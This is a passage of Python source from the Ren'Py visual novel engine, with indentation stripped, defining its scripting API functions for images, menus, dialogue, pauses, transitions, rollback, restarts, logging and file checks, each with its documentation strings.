The layer to check. If None, uses the default layer for `tag`.
"""
if not isinstance(name, tuple):
name = tuple(name.split())
if tag is None:
tag = name[0]
layer = default_layer(layer, None)
try:
return renpy.game.context().images.apply_attributes(layer, tag, name)
except:
return None
def showing(name, layer='master'):
"""
:doc: image_func
Returns true if an image with the same tag as `name` is showing on
`layer`.
    `name`
May be a string giving the image name or a tuple giving each
component of the image name. It may also be a string giving
only the image tag.
`layer`
The layer to check. If None, uses the default layer for `tag`.
"""
if not isinstance(name, tuple):
name = tuple(name.split())
layer = default_layer(layer, name)
return renpy.game.context().images.showing(layer, name)
def get_showing_tags(layer='master', sort=False):
"""
:doc: image_func
Returns the set of image tags that are currently being shown on `layer`. If
sort is true, returns a list of the tags from back to front.
"""
if sort:
return scene_lists().get_sorted_tags(layer)
return renpy.game.context().images.get_showing_tags(layer)
def get_hidden_tags(layer='master'):
"""
:doc: image_func
Returns the set of image tags on `layer` that are currently hidden, but
still have attribute information associated with them.
"""
return renpy.game.context().images.get_hidden_tags(layer)
def get_attributes(tag, layer=None, if_hidden=None):
"""
:doc: image_func
Return a tuple giving the image attributes for the image `tag`. If
the image tag has not had any attributes associated since the last
time it was hidden, returns `if_hidden`.
`layer`
The layer to check. If None, uses the default layer for `tag`.
"""
layer = default_layer(layer, tag)
return renpy.game.context().images.get_attributes(layer, tag, if_hidden)
def predict_show(name, layer=None, what=None, tag=None, at_list=[ ]):
"""
:undocumented:
Predicts a scene or show statement.
`name`
The name of the image to show, a string.
`layer`
The layer the image is being shown on.
`what`
What is being show - if given, overrides `name`.
`tag`
The tag of the thing being shown.
`at_list`
A list of transforms to apply to the displayable.
"""
key = tag or name[0]
    layer = default_layer(layer, key)
if what is None:
what = name
elif isinstance(what, basestring):
what = tuple(what.split())
if isinstance(what, renpy.display.core.Displayable):
base = img = what
else:
if renpy.config.image_attributes:
new_what = renpy.game.context().images.apply_attributes(layer, key, name)
if new_what is not None:
what = new_what
name = (key,) + new_what[1:]
base = img = renpy.display.image.ImageReference(what, style='image_placement')
if not base.find_target():
return
for i in at_list:
if isinstance(i, renpy.display.motion.Transform):
img = i(child=img)
else:
img = i(img)
img._unique()
renpy.game.context().images.predict_show(layer, name, True)
renpy.display.predict.displayable(img)
def show(name, at_list=[ ], layer=None, what=None, zorder=None, tag=None, behind=[ ], atl=None, transient=False, munge_name=True):
"""
:doc: se_images
:args: (name, at_list=[ ], layer='master', what=None, zorder=0, tag=None, behind=[ ])
Shows an image on a layer. This is the programmatic equivalent of the show
statement.
`name`
The name of the image to show, a string.
`at_list`
A list of transforms that are applied to the image.
The equivalent of the ``at`` property.
`layer`
A string, giving the name of the layer on which the image will be shown.
The equivalent of the ``onlayer`` property. If None, uses the default
layer associated with the tag.
`what`
If not None, this is a displayable that will be shown in lieu of
looking on the image. (This is the equivalent of the show expression
statement.) When a `what` parameter is given, `name` can be used to
associate a tag with the image.
`zorder`
An integer, the equivalent of the ``zorder`` property. If None, the
zorder is preserved if it exists, and is otherwise set to 0.
`tag`
A string, used to specify the image tag of the shown image. The
equivalent of the ``as`` property.
`behind`
A list of strings, giving image tags that this image is shown behind.
The equivalent of the ``behind`` property.
"""
default_transform = renpy.config.default_transform
if renpy.game.context().init_phase:
raise Exception("Show may not run while in init phase.")
if not isinstance(name, tuple):
name = tuple(name.split())
if zorder is None and not renpy.config.preserve_zorder:
zorder = 0
sls = scene_lists()
key = tag or name[0]
layer = default_layer(layer, key)
if renpy.config.sticky_positions:
if not at_list and key in sls.at_list[layer]:
at_list = sls.at_list[layer][key]
if not at_list:
tt = renpy.config.tag_transform.get(key, None)
if tt is not None:
if not isinstance(tt, list):
at_list = [ tt ]
else:
at_list = list(tt)
if what is None:
what = name
elif isinstance(what, basestring):
what = tuple(what.split())
if isinstance(what, renpy.display.core.Displayable):
if renpy.config.wrap_shown_transforms and isinstance(what, renpy.display.motion.Transform):
base = img = renpy.display.image.ImageReference(what, style='image_placement')
# Semi-principled, but mimics pre-6.99.6 behavior - if `what` is
# already a transform, do not apply the default transform to it.
default_transform = None
else:
base = img = what
else:
if renpy.config.image_attributes:
new_what = renpy.game.context().images.apply_attributes(layer, key, name)
if new_what is not None:
what = new_what
name = (key,) + new_what[1:]
base = img = renpy.display.image.ImageReference(what, style='image_placement')
if not base.find_target() and renpy.config.missing_show:
result = renpy.config.missing_show(name, what, layer)
if isinstance(result, renpy.display.core.Displayable):
base = img = result
elif result:
return
for i in at_list:
if isinstance(i, renpy.display.motion.Transform):
img = i(child=img)
else:
img = i(img)
# Mark the newly created images unique.
img._unique()
# Update the list of images we have ever seen.
renpy.game.persistent._seen_images[name] = True # @UndefinedVariable
if tag and munge_name:
name = (tag,) + name[1:]
if renpy.config.missing_hide:
renpy.config.missing_hide(name, layer)
sls.add(layer, img, key, zorder, behind, at_list=at_list, name=name, atl=atl, default_transform=default_transform, transient=transient)
def hide(name, layer=None):
"""
:doc: se_images
Hides an image from a layer. The Python equivalent of the hide statement.
`name`
The name of the image to hide. Only the image tag is used, and
any image with the tag is hidden (the precise name does not matter).
`layer`
The layer on which this function operates. If None, uses the default
layer associated with the tag.
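For example, the equivalent of ``hide eileen``::
$ renpy.hide("eileen")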
"""
if renpy.game.context().init_phase:
raise Exception("Hide may not run while in init phase.")
if not isinstance(name, tuple):
name = tuple(name.split())
sls = scene_lists()
key = name[0]
layer = default_layer(layer, key)
sls.remove(layer, key)
if renpy.config.missing_hide:
renpy.config.missing_hide(name, layer)
def scene(layer='master'):
"""
:doc: se_images
Removes all displayables from `layer`. This is equivalent to the scene
statement, when the scene statement is not given an image to show.
A full scene statement is equivalent to a call to renpy.scene followed by a
call to :func:`renpy.show`. For example::
scene bg beach
is equivalent to::
$ renpy.scene()
$ renpy.show("bg beach")
"""
if layer is None:
layer = 'master'
if renpy.game.context().init_phase:
raise Exception("Scene may not run while in init phase.")
sls = scene_lists()
sls.clear(layer)
if renpy.config.missing_scene:
renpy.config.missing_scene(layer)
def input(prompt, default='', allow=None, exclude='{}', length=None, with_none=None, pixel_width=None): # @ReservedAssignment
"""
:doc: input
Calling this function pops up a window asking the player to enter some
text. It returns the entered text.
`prompt`
A string giving a prompt to display to the player.
`default`
A string giving the initial text that will be edited by the player.
`allow`
If not None, a string giving a list of characters that will
be allowed in the text.
`exclude`
If not None, if a character is present in this string, it is not
allowed in the text.
`length`
If not None, this must be an integer giving the maximum length
of the input string.
`pixel_width`
If not None, the input is limited to being this many pixels wide,
in the font used by the input to display text.
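For example::
$ name = renpy.input("What is your name?", default="Eileen", length=20)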
"""
renpy.exports.mode('input')
roll_forward = renpy.exports.roll_forward_info()
if not isinstance(roll_forward, basestring):
roll_forward = None
# use previous data in rollback
if roll_forward is not None:
default = roll_forward
fixed = in_fixed_rollback()
if has_screen("input"):
widget_properties = { }
widget_properties["input"] = dict(default=default, length=length, allow=allow, exclude=exclude, editable=not fixed, pixel_width=pixel_width)
show_screen("input", _transient=True, _widget_properties=widget_properties, prompt=prompt)
else:
renpy.ui.window(style='input_window')
renpy.ui.vbox()
renpy.ui.text(prompt, style='input_prompt')
inputwidget = renpy.ui.input(default, length=length, style='input_text', allow=allow, exclude=exclude)
# disable input in fixed rollback
if fixed:
inputwidget.disable()
renpy.ui.close()
renpy.exports.shown_window()
if not renpy.game.after_rollback:
renpy.loadsave.force_autosave(True)
# use normal "say" click behavior if input can't be changed
if fixed:
renpy.ui.saybehavior()
rv = renpy.ui.interact(mouse='prompt', type="input", roll_forward=roll_forward)
renpy.exports.checkpoint(rv)
if with_none is None:
with_none = renpy.config.implicit_with_none
if with_none:
renpy.game.interface.do_with(None, None)
return rv
# The arguments and keyword arguments for the current menu call.
menu_args = None
menu_kwargs = None
def get_menu_args():
"""
:other:
Returns a tuple giving the arguments (as a tuple) and the keyword arguments
(as a dict) passed to the current menu statement.
"""
if menu_args is None:
return tuple(), dict()
return menu_args, menu_kwargs
def menu(items, set_expr, args=None, kwargs=None, item_arguments=None):
"""
:undocumented:
Displays a menu, and returns to the user the value of the selected
choice. Also handles conditions and the menuset.
"""
global menu_args
global menu_kwargs
args = args or tuple()
kwargs = kwargs or dict()
nvl = kwargs.pop("nvl", False)
if renpy.config.menu_arguments_callback is not None:
args, kwargs = renpy.config.menu_arguments_callback(*args, **kwargs)
if renpy.config.old_substitutions:
def substitute(s):
return s % tag_quoting_dict
else:
def substitute(s):
return s
if item_arguments is None:
item_arguments = [ (tuple(), dict()) ] * len(items)
# Filter the list of items on the set_expr:
if set_expr:
set = renpy.python.py_eval(set_expr) # @ReservedAssignment
new_items = [ ]
new_item_arguments = [ ]
for i, ia in zip(items, item_arguments):
if i[0] not in set:
new_items.append(i)
new_item_arguments.append(ia)
items = new_items
item_arguments = new_item_arguments
else:
set = None # @ReservedAssignment
# Filter the list of items to only include ones for which the
# condition is true.
if renpy.config.menu_actions:
location = renpy.game.context().current
new_items = [ ]
for (label, condition, value), (item_args, item_kwargs) in zip(items, item_arguments):
label = substitute(label)
condition = renpy.python.py_eval(condition)
if (not renpy.config.menu_include_disabled) and (not condition):
continue
if value is not None:
new_items.append((label, renpy.ui.ChoiceReturn(label, value, location, sensitive=condition, args=item_args, kwargs=item_kwargs)))
else:
new_items.append((label, None))
else:
new_items = [ (substitute(label), value)
for label, condition, value in items
if renpy.python.py_eval(condition) ]
# Check to see if there's at least one choice in the set of items:
choices = [ value for label, value in new_items if value is not None ]
# If not, bail out.
if not choices:
return None
# Show the menu.
try:
old_menu_args = menu_args
old_menu_kwargs = menu_kwargs
menu_args = args
menu_kwargs = kwargs
if nvl:
rv = renpy.store.nvl_menu(new_items) # @UndefinedVariable
else:
rv = renpy.store.menu(new_items)
finally:
menu_args = old_menu_args
menu_kwargs = old_menu_kwargs
# If we have a set, fill it in with the label of the chosen item.
if set is not None and rv is not None:
for label, condition, value in items:
if value == rv:
try:
set.append(label)
except AttributeError:
set.add(label)
return rv
def choice_for_skipping():
"""
:doc: other
Tells Ren'Py that a choice is coming up soon. This currently has
two effects:
* If Ren'Py is skipping, and the Skip After Choices preference is set
to stop skipping, skipping is terminated.
* An auto-save is triggered.
"""
if renpy.config.skipping and not renpy.game.preferences.skip_after_choices:
renpy.config.skipping = None
if renpy.config.autosave_on_choice and not renpy.game.after_rollback:
renpy.loadsave.force_autosave(True)
def predict_menu():
"""
:undocumented:
Predicts widgets that are used by the menu.
"""
# This only makes sense for non-NVL menus. But when we have
# NVL menus, they're likely to have already been predicted.
#
# An item lets us load imagebuttons as necessary.
if not renpy.config.choice_screen_chosen:
return
items = [ ("Menu Prediction", True, False) ]
predict_screen(
"choice",
items=items,
)
class MenuEntry(tuple):
"""
The object passed into the choice screen.
"""
def display_menu(items,
window_style='menu_window',
interact=True,
with_none=None,
caption_style='menu_caption',
choice_style='menu_choice',
choice_chosen_style='menu_choice_chosen',
choice_button_style='menu_choice_button',
choice_chosen_button_style='menu_choice_chosen_button',
scope={ },
widget_properties=None,
screen="choice",
type="menu", # @ReservedAssignment
predict_only=False,
**kwargs):
"""
:doc: se_menu
:name: renpy.display_menu
:args: (items, interact=True, screen="choice")
This displays a menu to the user. `items` should be a list of 2-item tuples.
In each tuple, the first item is a textual label, and the second item is
the value to be returned if that item is selected. If the value is None,
the first item is used as a menu caption.
This function takes many arguments, of which only a few are documented.
Except for `items`, all arguments should be given as keyword arguments.
`interact`
If false, the menu is displayed, but no interaction is performed.
`screen`
The name of the screen used to display the menu.
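For example::
$ rv = renpy.display_menu([ ("East.", "east"), ("West.", "west") ])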
"""
if interact:
renpy.exports.mode(type)
choice_for_skipping()
choices = [ ]
for _, val in items:
if isinstance(val, renpy.ui.ChoiceReturn):
val = val.value
if val is None:
continue
choices.append(val)
# Roll forward.
roll_forward = renpy.exports.roll_forward_info()
if roll_forward not in choices:
roll_forward = None
# Auto choosing.
if renpy.config.auto_choice_delay:
renpy.ui.pausebehavior(renpy.config.auto_choice_delay,
random.choice(choices))
# The location
location = renpy.game.context().current
# change behavior for fixed rollback
if in_fixed_rollback() and renpy.config.fix_rollback_without_choice:
renpy.ui.saybehavior()
scope = dict(scope)
menu_args, menu_kwargs = get_menu_args()
screen = menu_kwargs.pop("screen", screen)
scope.update(menu_kwargs)
# Show the menu.
if has_screen(screen):
item_actions = [ ]
if widget_properties is None:
props = { }
else:
props = widget_properties
for (label, value) in items:
if not label:
value = None
if isinstance(value, renpy.ui.ChoiceReturn):
action = value
chosen = action.get_chosen()
item_args = action.args
item_kwargs = action.kwargs
elif value is not None:
action = renpy.ui.ChoiceReturn(label, value, location)
chosen = action.get_chosen()
item_args = ()
item_kwargs = { }
else:
action = None
chosen = False
item_args = ()
item_kwargs = { }
if renpy.config.choice_screen_chosen:
me = MenuEntry((label, action, chosen))
else:
me = MenuEntry((label, action))
me.caption = label
me.action = action
me.chosen = chosen
me.args = item_args
me.kwargs = item_kwargs
item_actions.append(me)
show_screen(
screen,
items=item_actions,
_widget_properties=props,
_transient=True,
_layer=renpy.config.choice_layer,
*menu_args,
**scope)
else:
renpy.ui.window(style=window_style, focus="menu")
renpy.ui.menu(items,
location=renpy.game.context().current,
focus="choices",
default=True,
caption_style=caption_style,
choice_style=choice_style,
choice_chosen_style=choice_chosen_style,
choice_button_style=choice_button_style,
choice_chosen_button_style=choice_chosen_button_style,
**kwargs)
if renpy.config.menu_showed_window:
renpy.exports.shown_window()
# Log the chosen choice.
for label, val in items:
if val is not None:
log("Choice: " + label)
else:
log(label)
log("")
if interact:
rv = renpy.ui.interact(mouse='menu', type=type, roll_forward=roll_forward)
for label, val in items:
if rv == val:
log("User chose: " + label)
break
else:
log("No choice chosen.")
log("")
checkpoint(rv)
if with_none is None:
with_none = renpy.config.implicit_with_none
if with_none:
renpy.game.interface.do_with(None, None)
return rv
return None
class TagQuotingDict(object):
def __getitem__(self, key):
store = renpy.store.__dict__
if key in store:
rv = store[key]
if isinstance(rv, (str, unicode)):
rv = rv.replace("{", "{{")
return rv
else:
if renpy.config.debug:
raise Exception("During an interpolation, '%s' was not found as a variable." % key)
return "<" + key + " unbound>"
tag_quoting_dict = TagQuotingDict()
def predict_say(who, what):
"""
:undocumented:
This is called to predict the results of a say command.
"""
if who is None:
who = renpy.store.narrator # E1101 @UndefinedVariable
if isinstance(who, (str, unicode)):
return renpy.store.predict_say(who, what)
predict = getattr(who, 'predict', None)
if predict:
predict(what)
def scry_say(who, scry):
"""
:undocumented:
Called when scry is called on a say statement. Needs to set
the interacts field.
"""
try:
scry.interacts = who.will_interact()
except:
scry.interacts = True
def say(who, what, *args, **kwargs):
"""
:doc: se_say
The equivalent of the say statement.
`who`
Either the character that will say something, None for the narrator,
or a string giving the character name. In the latter case,
:func:`say` is used to create the speaking character.
`what`
A string giving the line to say. Percent-substitutions are performed
in this string.
`interact`
If true, Ren'Py waits for player input when displaying the dialogue. If
false, Ren'Py shows the dialogue, but does not perform an interaction.
(This is passed in as a keyword argument.)
This function is rarely necessary, as the following three lines are
equivalent. ::
e "Hello, world."
$ renpy.say(e, "Hello, world.")
$ e("Hello, world.")
"""
if renpy.config.old_substitutions:
# Interpolate variables.
what = what % tag_quoting_dict
if who is None:
who = renpy.store.narrator # E1101 @UndefinedVariable
if renpy.config.say_arguments_callback:
args, kwargs = renpy.config.say_arguments_callback(who, *args, **kwargs)
if isinstance(who, (str, unicode)):
renpy.store.say(who, what, *args, **kwargs)
else:
who(what, *args, **kwargs)
def imagemap(ground, selected, hotspots, unselected=None, overlays=False,
style='imagemap', mouse='imagemap', with_none=None, **properties):
"""
:undocumented: Use screens already.
Displays an imagemap. An image map consists of two images and a
list of hotspots that are defined on that image. When the user
clicks on a hotspot, the value associated with that hotspot is
returned.
@param ground: The name of the file containing the ground
image. The ground image is displayed for areas that are not part
of any hotspots.
@param selected: The name of the file containing the selected
image. This image is displayed in hotspots when the mouse is over
them.
@param hotspots: A list of tuples defining the hotspots in this
image map. Each tuple has the format (x0, y0, x1, y1, result).
(x0, y0) gives the coordinates of the upper-left corner of the
hotspot, (x1, y1) gives the lower-right corner, and result gives
the value returned from this function if the mouse is clicked in
the hotspot.
@param unselected: If provided, then it is the name of a file
containing the image that's used to fill in hotspots that are not
selected as part of any image. If not provided, the ground image
is used instead.
@param overlays: If True, overlays are displayed when this imagemap
is active. If False, the overlays are suppressed.
@param with_none: If True, performs a with None after the input. If None,
takes the value from config.implicit_with_none.
"""
renpy.exports.mode('imagemap')
renpy.ui.imagemap_compat(ground, selected, hotspots, unselected=unselected,
style=style, **properties)
roll_forward = renpy.exports.roll_forward_info()
if roll_forward not in [ result for _x0, _y0, _x1, _y1, result in hotspots]:
roll_forward = None
if in_fixed_rollback() and renpy.config.fix_rollback_without_choice:
renpy.ui.saybehavior()
rv = renpy.ui.interact(suppress_overlay=(not overlays),
type='imagemap',
mouse=mouse,
roll_forward=roll_forward)
renpy.exports.checkpoint(rv)
if with_none is None:
with_none = renpy.config.implicit_with_none
if with_none:
renpy.game.interface.do_with(None, None)
return rv
def pause(delay=None, music=None, with_none=None, hard=False, checkpoint=None):
"""
:doc: other
:args: (delay=None, hard=False)
Causes Ren'Py to pause. Returns true if the user clicked to end the pause,
or false if the pause timed out or was skipped.
`delay`
If given, the number of seconds Ren'Py should pause for.
`hard`
This must be given as a keyword argument. When True, Ren'Py may prevent
the user from clicking to interrupt the pause. If the player enables
skipping, the hard pause will be skipped. There may be other circumstances
where the hard pause ends early or prevents Ren'Py from operating properly;
these will not be treated as bugs.
In general, using hard pauses is rude. When the user clicks to advance
the game, it's an explicit request - the user wishes the game to advance.
To override that request is to assume you understand what the player
wants more than the player does.
Calling renpy.pause guarantees that whatever is on the screen will be
displayed for at least one frame, and hence has been shown to the
player.
tl;dr - Don't use renpy.pause with hard=True.
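For example, to keep the current scene up for at least three seconds (the player can still click through)::
$ renpy.pause(3.0)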
"""
if checkpoint is None:
if delay is not None:
checkpoint = False
else:
checkpoint = True
if renpy.config.skipping == "fast":
return False
roll_forward = renpy.exports.roll_forward_info()
if roll_forward not in [ True, False ]:
roll_forward = None
renpy.exports.mode('pause')
if music is not None:
newdelay = renpy.audio.music.get_delay(music)
if newdelay is not None:
delay = newdelay
if (delay is not None) and renpy.game.after_rollback and roll_forward is None:
delay = 0
if delay is None:
afm = " "
else:
afm = None
if hard or not renpy.store._dismiss_pause:
renpy.ui.saybehavior(afm=afm, dismiss='dismiss_hard_pause')
else:
renpy.ui.saybehavior(afm=afm)
if delay is not None:
renpy.ui.pausebehavior(delay, False)
rv = renpy.ui.interact(mouse='pause', type='pause', roll_forward=roll_forward)
if checkpoint:
renpy.exports.checkpoint(rv, keep_rollback=True)
if with_none is None:
with_none = renpy.config.implicit_with_none
if with_none:
renpy.game.interface.do_with(None, None)
return rv
def movie_cutscene(filename, delay=None, loops=0, stop_music=True):
"""
:doc: movie_cutscene
This displays a movie cutscene for the specified number of
seconds. The user can click to interrupt the cutscene.
Overlays and Underlays are disabled for the duration of the cutscene.
`filename`
The name of a file containing any movie playable by Ren'Py.
`delay`
The number of seconds to wait before ending the cutscene.
Normally the length of the movie, in seconds. If None, the delay is
computed as (loops + 1) times the length of the movie. If -1, Ren'Py
waits until the user clicks.
`loops`
The number of extra loops to show, -1 to loop forever.
Returns True if the movie was terminated by the user, or False if the
given delay elapsed uninterrupted.
"""
renpy.exports.mode('movie')
if stop_music:
renpy.audio.audio.set_force_stop("music", True)
movie_start_fullscreen(filename, loops=loops)
renpy.ui.saybehavior()
if delay is None or delay < 0:
renpy.ui.soundstopbehavior("movie")
else:
renpy.ui.pausebehavior(delay, False)
if renpy.game.log.forward:
roll_forward = True
else:
roll_forward = None
rv = renpy.ui.interact(suppress_overlay=True,
roll_forward=roll_forward)
# We don't want to put a checkpoint here, as we can't roll back while
# playing a cutscene.
movie_stop()
if stop_music:
renpy.audio.audio.set_force_stop("music", False)
return rv
def with_statement(trans, always=False, paired=None, clear=True):
"""
:doc: se_with
:name: renpy.with_statement
:args: (trans, always=False)
Causes a transition to occur. This is the Python equivalent of the
with statement.
`trans`
The transition.
`always`
If True, the transition will always occur, even if the user has
disabled transitions.
This function returns true if the user chose to interrupt the transition,
and false otherwise.
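For example, the equivalent of ``with dissolve`` (assuming the standard ``dissolve`` transition)::
$ renpy.with_statement(dissolve)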
"""
if renpy.game.context().init_phase:
raise Exception("With statements may not run while in init phase.")
if renpy.config.skipping:
trans = None
if not (renpy.game.preferences.transitions or always):
trans = None
renpy.exports.mode('with')
if isinstance(paired, dict):
paired = paired.get(None, None)
if (trans is None) and (paired is None):
return
if isinstance(trans, dict):
for k, v in trans.items():
if k is None:
continue
renpy.exports.transition(v, layer=k)
if None not in trans:
return
trans = trans[None]
return renpy.game.interface.do_with(trans, paired, clear=clear)
globals()["with"] = with_statement
def rollback(force=False, checkpoints=1, defer=False, greedy=True, label=None, abnormal=True, current_label=None):
"""
:doc: rollback
:args: (force=False, checkpoints=1, defer=False, greedy=True, label=None, abnormal=True)
Rolls the state of the game back to the last checkpoint.
`force`
If true, the rollback will occur in all circumstances. Otherwise,
the rollback will only occur if rollback is enabled in the store,
context, and config.
`checkpoints`
Ren'Py will roll back through this many calls to renpy.checkpoint. It
will roll back as far as it can, subject to this condition.
`defer`
If true, the call will be deferred until control returns to the main
context.
`greedy`
If true, rollback will finish just after the previous checkpoint.
If false, rollback will finish just before the current checkpoint.
`label`
If not None, a label that is called when rollback completes.
`abnormal`
If true, the default, script executed after the transition is run in
an abnormal mode that skips transitions that would have otherwise
occurred. Abnormal mode ends when an interaction begins.
"""
if defer and len(renpy.game.contexts) > 1:
renpy.game.contexts[0].defer_rollback = (force, checkpoints)
return
if not force:
if not renpy.store._rollback:
return
if not renpy.game.context().rollback:
return
if not renpy.config.rollback_enabled:
return
renpy.config.skipping = None
renpy.game.log.complete()
renpy.game.log.rollback(checkpoints, greedy=greedy, label=label, force=(force is True), abnormal=abnormal, current_label=current_label)
def toggle_fullscreen():
"""
:undocumented:
Toggles the fullscreen mode.
"""
renpy.game.preferences.fullscreen = not renpy.game.preferences.fullscreen
def toggle_music():
"""
:undocumented:
Does nothing.
"""
@renpy_pure
def has_label(name):
"""
:doc: label
Returns true if `name` is a valid label in the program, or false otherwise.
`name`
Should be a string to check for the existence of a label. It can
also be an opaque tuple giving the name of a non-label statement.
"""
return renpy.game.script.has_label(name)
@renpy_pure
def get_all_labels():
"""
:doc: label
Returns the set of all labels defined in the program, including labels
defined for internal use in the libraries.
"""
rv = [ ]
for i in renpy.game.script.namemap.iterkeys():
if isinstance(i, basestring):
rv.append(i)
return renpy.python.RevertableSet(rv)
def take_screenshot(scale=None, background=False):
"""
:doc: loadsave
Causes a screenshot to be taken. This screenshot will be saved as part of
a save game.
"""
if scale is None:
scale = (renpy.config.thumbnail_width, renpy.config.thumbnail_height)
renpy.game.interface.take_screenshot(scale, background=background)
def full_restart(transition=False, label="_invoke_main_menu", target="_main_menu"):
"""
:doc: other
Causes Ren'Py to restart, returning the user to the main menu.
`transition`
If given, the transition to run, or None to not run a transition.
False uses :var:`config.end_game_transition`.
"""
if transition is False:
transition = renpy.config.end_game_transition
raise renpy.game.FullRestartException((transition, label, target))
def utter_restart():
"""
:undocumented: Used in the implementation of shift+R.
Causes an utter restart of Ren'Py. This reloads the script and
re-runs initialization.
"""
raise renpy.game.UtterRestartException()
def reload_script():
"""
:doc: other
Causes Ren'Py to save the game, reload the script, and then load the
save.
"""
s = get_screen("menu")
session.pop("_reload_screen", None)
session.pop("_reload_screen_args", None)
session.pop("_reload_screen_kwargs", None)
if not renpy.store.main_menu:
if s is not None:
session["_reload_screen"] = s.screen_name[0]
session["_reload_screen_args"] = s.scope.get("_args", ())
session["_reload_screen_kwargs"] = s.scope.get("_kwargs", { })
renpy.game.call_in_new_context("_save_reload_game")
else:
if s is not None:
session["_main_menu_screen"] = s.screen_name[0]
session["_main_menu_screen_args"] = s.scope.get("_args", ())
session["_main_menu_screen_kwargs"] = s.scope.get("_kwargs", { })
utter_restart()
def quit(relaunch=False, status=0, save=False): # @ReservedAssignment
"""
:doc: other
This causes Ren'Py to exit entirely.
`relaunch`
If true, Ren'Py will run a second copy of itself before quitting.
`status`
The status code Ren'Py will return to the operating system.
Generally, 0 is success, and positive integers are failure.
`save`
If true, the game is saved in :var:`_quit_slot` before Ren'Py
terminates.
"""
if save and (renpy.store._quit_slot is not None):
renpy.loadsave.save(renpy.store._quit_slot, getattr(renpy.store, "save_name", ""))
if has_label("quit"):
call_in_new_context("quit")
raise renpy.game.QuitException(relaunch=relaunch, status=status)
def jump(label):
"""
:doc: se_jump
Causes the current statement to end, and control to jump to the given
label.
"""
raise renpy.game.JumpException(label)
def jump_out_of_context(label):
"""
:doc: label
Causes control to leave the current context, and then to be
transferred in the parent context to the given label.
"""
raise renpy.game.JumpOutException(label)
def call(label, *args, **kwargs):
"""
:doc: se_call
Causes the current Ren'Py statement to terminate, and a jump to a
`label` to occur. When the jump returns, control will be passed
to the statement following the current statement.
`from_current`
If true, control will return to the current statement, rather than
the statement following the current statement. (This will lead to
the current statement being run twice. This must be passed as a
keyword argument.)
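For example (a sketch; ``subroutine`` is a hypothetical label), the equivalent of ``call subroutine(2)``::
$ renpy.call("subroutine", 2)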
"""
from_current = kwargs.pop("from_current", False)
raise renpy.game.CallException(label, args, kwargs, from_current=from_current)
def return_statement():
"""
:doc: se_call
Causes Ren'Py to return from the current Ren'Py-level call.
"""
jump("_renpy_return")
def screenshot(filename):
"""
:doc: other
Saves a screenshot in `filename`.
Returns True if the screenshot was saved successfully, False if saving
failed for some reason.
"""
return renpy.game.interface.save_screenshot(filename)
@renpy_pure
def version(tuple=False): # @ReservedAssignment
"""
:doc: renpy_version
If `tuple` is false, returns a string containing "Ren'Py ", followed by
the current version of Ren'Py.
If `tuple` is true, returns a tuple giving each component of the
version as an integer.
"""
if tuple:
return renpy.version_tuple
return renpy.version
version_string = renpy.version
version_only = renpy.version_only
version_name = renpy.version_name
version_tuple = renpy.version_tuple
license = "" # @ReservedAssignment
try:
import platform as _platform
platform = "-".join(_platform.platform().split("-")[:2])
except:
if renpy.android:
platform = "Android"
elif renpy.ios:
platform = "iOS"
else:
platform = "Unknown"
def transition(trans, layer=None, always=False, force=False):
"""
:doc: other
:args: (trans, layer=None, always=False)
Sets the transition that will be used during the next interaction.
`layer`
The layer the transition applies to. If None, the transition
applies to the entire scene.
`always`
If false, this respects the transition preference. If true, the
transition is always run.
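For example, assuming the standard ``dissolve`` transition, to dissolve in the changes made during the next interaction::
$ renpy.transition(dissolve)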
"""
if isinstance(trans, dict):
for layer, t in trans.items():
transition(t, layer=layer, always=always, force=force)
return
if (not always) and not renpy.game.preferences.transitions:
trans = None
renpy.game.interface.set_transition(trans, layer, force=force)
def get_transition(layer=None):
"""
:doc: other
Gets the transition for `layer`, or the entire scene if
`layer` is None. This returns the transition that is queued up
to run during the next interaction, or None if no such
transition exists.
"""
return renpy.game.interface.transition.get(layer, None)
def clear_game_runtime():
"""
:doc: other
Resets the game runtime counter.
"""
renpy.game.contexts[0].runtime = 0
def get_game_runtime():
"""
:doc: other
Returns the game runtime counter.
The game runtime counter counts the number of seconds that have
elapsed while waiting for user input in the top-level context.
(It does not count time spent in the main or game menus.)
"""
return renpy.game.contexts[0].runtime
@renpy_pure
def loadable(filename):
"""
:doc: file
Returns True if the given filename is loadable, meaning that it
can be loaded from the disk or from inside an archive. Returns
False if this is not the case.
"""
return renpy.loader.loadable(filename)
@renpy_pure
def exists(filename):
"""
:doc: file_rare
Returns true if the given filename can be found in the
searchpath. This only works if a physical file exists on disk. It
won't find the file if it's inside of an archive.
You almost certainly want to use :func:`renpy.loadable` in preference
to this function.
"""
try:
renpy.loader.transfn(filename)
return True
except:
return False
def restart_interaction():
"""
:doc: other
Restarts the current interaction. Among other things, this displays
images added to the scene, re-evaluates screens, and starts any
queued transitions.
This only does anything when called from within an interaction (for
example, from an action). Outside an interaction, this function has
no effect.
"""
try:
renpy.game.interface.restart_interaction = True
except:
pass
def context():
"""
:doc: context
Returns an object that is unique to the current context. The object
is copied when entering a new context, but changes to the copy do
not change the original.
The object is saved and participates in rollback.
"""
return renpy.game.context().info
def context_nesting_level():
"""
:doc: context
Returns the nesting level of the current context. This is 0 for the
outermost context (the context that is saved, loaded, and rolled-back),
and is non-zero in other contexts, such as menu and replay contexts.
"""
return len(renpy.game.contexts) - 1
def music_start(filename, loops=True, fadeout=None, fadein=0):
"""
Deprecated music start function, retained for compatibility. Use
renpy.music.play() or .queue() instead.
"""
renpy.audio.music.play(filename, loop=loops, fadeout=fadeout, fadein=fadein)
def music_stop(fadeout=None):
"""
Deprecated music stop function, retained for compatibility. Use
renpy.music.stop() instead.
"""
renpy.audio.music.stop(fadeout=fadeout)
def get_filename_line():
"""
:doc: debug
Returns a pair giving the filename and line number of the current
statement.
"""
n = renpy.game.script.namemap.get(renpy.game.context().current, None)
if n is None:
return "unknown", 0
else:
return n.filename, n.linenumber
# A file that log logs to.
logfile = None
def log(msg):
"""
:doc: debug
If :var:`config.log` is not set, this does nothing. Otherwise, it opens
the logfile (if not already open), formats the message to :var:`config.log_width`
columns, and prints it to the logfile.
"""
global logfile
if not renpy.config.log:
return
if msg is None:
return
try:
if not logfile:
import codecs
logfile = _file(renpy.config.log, "a")
if not logfile.tell():
logfile.write(codecs.BOM_UTF8)
import textwrap
print(textwrap.fill(msg, renpy.config.log_width).encode("utf-8"), file=logfile)
logfile.flush()
except:
renpy.config.log = None
def force_full_redraw():
"""
:doc: other
Forces the screen to be redrawn in full. Call this after using pygame
to redraw the screen directly.
"""
renpy.game.interface.full_redraw = True
def do_reshow_say(who, what, interact=False, *args, **kwargs):
if who is not None:
who = renpy.python.py_eval(who)
say(who, what, interact=interact, *args, **kwargs)
curried_do_reshow_say = curry(do_reshow_say)
